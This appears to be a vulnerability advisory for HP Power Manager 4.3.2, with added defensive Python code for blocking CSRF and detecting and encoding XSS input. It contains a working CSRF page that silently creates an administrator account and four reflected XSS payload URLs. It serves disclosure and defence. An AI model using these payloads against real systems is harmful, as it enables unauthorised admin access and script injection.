Thursday, April 19, 2012

HP Power Manager 4.3.2 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Description
HP Power Manager (HPPM) is a web-based application that enables administrators to manage an HP UPS from a browser-based management console. Administrators can monitor, manage, and control a single UPS locally and remotely.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in HP Power Manager. These issues were discovered in a default installation of HP Power Manager 4.3.2; earlier versions may also be affected.


Proof of concept
Cross-Site Request Forgery (CSRF)
==========================
<html>
<body>
<form action="http://[target]/goform/formSetUsers" id="csrf" method="post">
<input type="hidden" name="name9" value="attacker" />
<input type="hidden" name="pass9" value="passwd123" />
<input type="hidden" name="rpass9" value="passwd123" />
<input type="hidden" name="admin9" value="on" />
<input type="hidden" name="actionType" value="1" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>
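
The PoC above works because formSetUsers accepts any POST that arrives with the administrator's session cookie. As an added illustration of the missing server-side control (example code written for this page, not from the advisory and not HP's or HPPM's own code), the following Python guard rejects that forged request and accepts the same fields when they come from the console itself. The hostname hppm.example.internal, the csrf_token field name and all function names are assumptions.

```python
# Added example, not from the advisory and not HPPM's own code: a minimal
# server-side CSRF guard that would reject the forged POST to
# /goform/formSetUsers built by the PoC page above. The hostname, the
# "csrf_token" field name and all function names are assumptions.
from secrets import compare_digest, token_urlsafe
from urllib.parse import urlsplit

# Constructed hostname standing in for the HPPM console's own origin.
EXPECTED_HOST = "hppm.example.internal"

# The fields the PoC page submits, copied here as constructed sample input.
FORGED_FORM = {
    "name9": "attacker", "pass9": "passwd123", "rpass9": "passwd123",
    "admin9": "on", "actionType": "1",
}


def new_session_token() -> str:
    """Issue a per-session synchronizer token; the server stores it and embeds it in its own forms."""
    return token_urlsafe(32)


def is_same_origin(headers: dict) -> bool:
    """Accept only if Origin (or, failing that, Referer) names the console host.

    Headers are assumed to be already case-normalised by the web framework.
    A state-changing POST carrying neither header is treated as cross-site.
    """
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).hostname == EXPECTED_HOST
    return False


def accept_form_post(headers: dict, form: dict, session_token: str) -> bool:
    """Both the origin check and the token check must pass before users are changed.

    The token is the primary control: a page on another origin cannot read it,
    so an auto-submitted form like the PoC arrives without it. The origin check
    is defence in depth for browsers that send Origin on cross-site POSTs.
    """
    if not is_same_origin(headers):
        return False
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so the check itself does not leak the token.
    return compare_digest(submitted.encode(), session_token.encode())


def demo() -> tuple:
    """Run the guard against the forged PoC request and a legitimate admin request."""
    token = new_session_token()
    # 1. The PoC page: auto-submitted from an attacker-controlled origin, no token.
    forged_headers = {"Origin": "http://evil.example"}
    forged_ok = accept_form_post(forged_headers, FORGED_FORM, token)
    # 2. The same fields submitted from the console's own page, token included.
    legit_headers = {"Origin": "http://" + EXPECTED_HOST}
    legit_ok = accept_form_post(legit_headers, {**FORGED_FORM, "csrf_token": token}, token)
    return forged_ok, legit_ok


if __name__ == "__main__":
    print(demo())  # (False, True)
```

The token check is what actually closes the hole: the browser will still attach the session cookie to the cross-site POST, but the attacker's page cannot read the token out of the console's own form, so the request fails before any user is created. Checking Origin/Referer alone is weaker, since older browsers did not send Origin on every POST and Referer can be suppressed, which is why it is treated here as a second layer rather than the control.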

Cross-Site Scripting (XSS)
====================

  • http://[target]/contents/exportlogs.asp?logType=Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2&SORTORD=2"%20onMouseOver%3dalert%281%29%2f%2f&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2"%20onMouseOver%3dalert%281%29%2f%2f&SORTORD=2&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/pagehelp.asp?Id=About%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e
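
The four URLs reflect a query parameter into the page unencoded; two of them are double percent-encoded and two land inside a double-quoted attribute. As an added worked example (written for this page, not from the advisory and not HPPM's own code), the Python below decodes each PoC URL to show exactly what reaches the page, flags the parameter with a simple reflected-XSS heuristic, and applies the context-appropriate output encoding that would have neutralised it. Function names and the heuristic pattern are assumptions.

```python
# Added example, not from the advisory and not HPPM's own code: decode the
# four PoC URLs above to show the markup that reaches the page, flag them
# with a simple reflected-XSS heuristic, and apply the output encoding that
# would neutralise each payload in its context. Function names are assumptions.
import re
from html import escape
from urllib.parse import parse_qsl, unquote_plus

# The advisory's PoC URLs, kept verbatim (the [target] placeholder is the page's own).
POC_URLS = [
    "http://[target]/contents/exportlogs.asp?logType=Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e",
    "http://[target]/contents/applicationlogs.asp?SORTCOL=2&SORTORD=2\"%20onMouseOver%3dalert%281%29%2f%2f&TIME=0&PAGE=1&ITEMSPERPAGE=20",
    "http://[target]/contents/applicationlogs.asp?SORTCOL=2\"%20onMouseOver%3dalert%281%29%2f%2f&SORTORD=2&TIME=0&PAGE=1&ITEMSPERPAGE=20",
    "http://[target]/contents/pagehelp.asp?Id=About%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e",
]

# Markup that has no business in a log-sort column or a help-page id.
XSS_MARKERS = re.compile(r"<\s*/?\s*script|\bon[a-z]+\s*=", re.IGNORECASE)


def fully_decode(value: str) -> str:
    """Undo percent-encoding until the value is stable.

    Two of the PoCs are double-encoded (%253c -> %3c -> <), which is what a
    value looks like after one decode by the server and one more by the page.
    """
    while True:
        decoded = unquote_plus(value)
        if decoded == value:
            return decoded
        value = decoded


def suspicious_params(url: str) -> dict:
    """Return {parameter: decoded value} for query parameters carrying script markup."""
    # str.partition rather than urlsplit: the page's "[target]" placeholder is
    # not a valid bracketed host and newer urlsplit versions reject it.
    query = url.partition("?")[2]
    found = {}
    for name, raw in parse_qsl(query, keep_blank_values=True):
        decoded = fully_decode(raw)
        if XSS_MARKERS.search(decoded):
            found[name] = decoded
    return found


def render_text(value: str) -> str:
    """Encoding for text between tags: '<', '>' and '&' become entities."""
    return escape(value, quote=False)


def render_attribute(value: str) -> str:
    """Encoding for a double-quoted attribute value: quotes are encoded too,
    so the value cannot close the attribute and start an event handler."""
    return escape(value, quote=True)


if __name__ == "__main__":
    for url in POC_URLS:
        for param, value in suspicious_params(url).items():
            print(f"{param}: {value!r}")
            print("  text context      ->", render_text(value))
            print("  attribute context ->", render_attribute(value))
```

Running it shows logType and Id decoding to a bare script element, and SORTCOL/SORTORD decoding to a quote followed by an onMouseOver handler, i.e. a value that breaks out of an attribute rather than a text node. That distinction is the point of the two encoders: escaping only angle brackets leaves the attribute-context payload intact, so the encoding has to match where the value is written, and the heuristic is a detection aid only, not a substitute for encoding on output.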

Solution
HP recommends the following:

  • Open a browser instance, log on to HPPM, perform needed task, and log off from HPPM.
  • Do not visit untrusted web sites while logged on to HPPM.
  • Use a firewall to limit access to HPPM.

References

Vendor URL: http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131
Secunia: http://secunia.com/advisories/43058/

Disclosure Timeline
2011-01-25 - CSRF Vulnerability discovered.
2011-01-25 - CSRF Vulnerability reported to Secunia.
2011-01-26 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-07 - HP released recommendation for CSRF.
2011-02-08 - Advisory published by Secunia.
2011-02-10 - XSS Vulnerability discovered.
2011-02-10 - XSS Vulnerability reported to Secunia.
2011-02-10 - Secunia confirmed the vulnerability and contacted the vendor.
2011-03-09 - HP released recommendation for XSS.
2011-03-10 - Advisory updated by Secunia.
